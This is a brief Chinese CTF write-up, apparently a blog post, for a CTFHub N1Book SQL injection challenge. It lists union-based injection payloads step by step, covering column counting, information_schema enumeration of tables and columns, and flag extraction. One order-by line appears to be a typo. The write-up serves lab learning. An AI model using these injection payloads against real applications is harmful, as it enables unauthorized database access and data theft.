CTFHub_N1Book-SQL注入-1（union注入）

N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-1

writeup:

1.确认是字符型注入
1'            #无回显
1' --+        #有回显

2.order by确认共有3列
1' order by 3 --+    #有回显
1' order by 3 --+    #无回显


2.union注入，确认显示位
-1' union select 1,2,3 --+    #回显2 3

3.获取表名：fl4g,notes
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

4.获取字段名：fllllag
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='fl4g' --+

5.获取flag
-1' union select 1,2,fllllag from fl4g --+

最终拿到flag

posted @ 2022-03-24 08:33 zhengna 阅读(693) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

CTFHub_N1Book-SQL注入-1（union注入）

公告